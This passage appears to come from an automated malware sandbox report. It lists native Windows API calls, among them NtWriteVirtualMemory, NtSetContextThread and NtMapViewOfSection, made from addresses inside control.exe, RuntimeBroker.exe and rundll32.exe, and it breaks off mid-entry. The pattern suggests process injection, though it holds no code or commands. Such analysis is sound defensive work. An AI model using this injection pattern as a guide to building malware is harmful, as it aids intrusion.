            Source: C:\Windows\System32\control.exe | Code function: 14_2_007B0570 NtSetContextThread, 14_2_007B0570
            Source: C:\Windows\System32\control.exe | Code function: 14_2_007AB5BC NtReadVirtualMemory, 14_2_007AB5BC
            Source: C:\Windows\System32\control.exe | Code function: 14_2_007CAEAC NtWriteVirtualMemory, 14_2_007CAEAC
            Source: C:\Windows\System32\control.exe | Code function: 14_2_007CD6AC NtQueryInformationProcess, 14_2_007CD6AC
            Source: C:\Windows\System32\control.exe | Code function: 14_2_007C2F88 NtQueryInformationProcess, 14_2_007C2F88
            Source: C:\Windows\System32\control.exe | Code function: 14_2_007E1041 NtProtectVirtualMemory,NtProtectVirtualMemory, 14_2_007E1041
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 16_2_000002413CB2D6AC NtQueryInformationProcess, 16_2_000002413CB2D6AC
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 16_2_000002413CB23C40 NtQueryInformationToken,NtQueryInformationToken, 16_2_000002413CB23C40
            Source: C:\Windows\System32\rundll32.exe | Code function: 17_2_000001EA04133C40 NtQueryInformationToken,NtQueryInformationToken,NtClose, 17_2_000001EA04133C40
            Source: C:\Windows\System32\rundll32.exe | Code function: 17_2_000001EA0413D6AC NtQueryInformationProcess, 17_2_000001EA0413D6AC
            Source: C:\Windows\System32\rundll32.exe | Code function: 17_2_000001EA0415104B NtProtectVirtualMemory,NtProtectVirtualMemory, 17_2_000001EA0415104B
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 18_2_000001E766783C40 NtQueryInformationToken,NtQueryInformationToken, 18_2_000001E766783C40
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 18_2_000001E76678D6AC NtQueryInformationProcess, 18_2_000001E76678D6AC
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 19_2_00000209AC2ED6AC NtQueryInformationProcess, 19_2_00000209AC2ED6AC
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 19_2_00000209AC2E3C40 NtQueryInformationToken,NtQueryInformationToken, 19_2_00000209AC2E3C40
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 21_2_000001598A09D6AC NtQueryInformationProcess, 21_2_000001598A09D6AC
            Source: C:\Windows\System32\RuntimeBroker.exe | Code function: 21_2_000001598A093C40 NtQueryInformationToken,NtQueryInformationToken, 21_2_000001598A093C40
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 22_2_000001F9FF95D6AC NtQueryInformationProcess,22_2_000001F9FF95D6AC
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 22_2_000001F9FF953C40 NtQueryInformationToken,NtQueryInformationToken,22_2_000001F9FF953C40
            Source: C:\Windows\System32\rundll32.exeCode function: 25_2_000002EEDF847CF4 NtCreateSection,NtUnmapViewOfSection,FindCloseChangeNotification,RtlDeleteBoundaryDescriptor,25_2_000002EEDF847CF4
            Source: C:\Windows\System32\rundll32.exeCode function: 25_2_000002EEDF863C40 NtQueryInformationToken,NtQueryInformationToken,NtClose,25_2_000002EEDF863C40
            Source: C:\Windows\System32\rundll32.exeCode function: 25_2_000002EEDF84E36C NtAllocateVirtualMemory,25_2_000002EEDF84E36C
            Source: C:\Windows\System32\rundll32.exeCode function: 25_2_000002EEDF84E25C NtMapViewOfSection,25_2_000002EEDF84E25C
            Source: C:\Windows\System32\rundll32.exeCode function: 25_2_000002EEDF846808 NtQueryInformationProcess,25_2_000002EEDF846808
            Source: C:\Windows\System32\rundll32.exeCode function: 25_2_000002EEDF862F88 NtQueryInformationProcess,25_2_000002EEDF862F88
            Source: C:\Windows\System32\rundll32.exeCode function: 25_2_000002EEDF86D6AC NtQueryInformation